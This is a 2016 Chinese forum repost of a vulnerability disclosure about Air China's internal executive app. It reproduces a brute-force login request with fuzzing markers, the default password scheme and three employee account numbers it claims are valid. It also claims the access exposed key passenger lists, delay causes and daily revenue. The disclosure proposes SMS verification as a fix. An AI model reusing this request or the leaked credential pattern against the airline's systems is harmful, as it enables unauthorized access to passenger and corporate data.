HanDs
管理员

[7月漏洞公开] 中国国际航空股份有限公司某内部APP设计缺陷可获取大量敏感信息 



你喜欢的空姐,我没找到

详细说明:

http://app.airchina.com.cn下载“高管驾驶舱”

爆破接口:

code 区域
GET /camc_pserver/loginAction.do?method=loginCheck&WORK_NO=000001§2345§&PASSWORD=airchina1§2345§&VERSION_ID=1.0-ai-b06-1.5&DEVICE_OS_VERSION=8.1.1&DEVICE_SN=81C6EEB3-1C5A-46B9-BAFA-B799BE9CDB77&DEVICE_BRAND=iPhone HTTP/1.1
Host: mp.airchina.com.cn:8001
Accept: */*
User-Agent: %E9%AB%98%E7%AE%A1%E9%A9%BE%E9%A9%B6%E8%88%B1/1.0 CFNetwork/711.1.16 Darwin/14.0.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Connection: keep-alive



获取了几个可用账号,默认密码airchina+00000后面的编号:

0000010340

0000010515

0000010516

成功登陆APP

漏洞证明:

可遍历航班重点旅客

001.png

002.png



可查看航班情况(延误原因等)

0003.png



可查看每天的营收

IMG_0723.PNG



其他

IMG_0724.PNG

IMG_0725.PNG

IMG_0727.PNG



修复方案:

短信二次验证


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
中国
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复